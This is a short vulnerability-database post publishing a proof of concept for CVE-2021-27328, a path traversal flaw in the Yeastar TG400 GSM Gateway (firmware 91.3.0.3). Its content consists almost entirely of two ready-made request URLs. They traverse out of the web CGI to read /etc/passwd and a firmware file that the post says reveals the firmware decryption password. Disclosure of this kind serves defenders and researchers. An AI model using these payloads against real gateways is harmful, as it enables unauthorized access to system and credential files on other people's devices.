Saturday, February 27, 2021

Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal

exploit file inclusion vulnerabilities In: , , 
Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3

This is a Proof of Concept for CVE-2021-27328
Example

    to get firmware decrypting password

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

    to get /etc/paswd

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd


 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore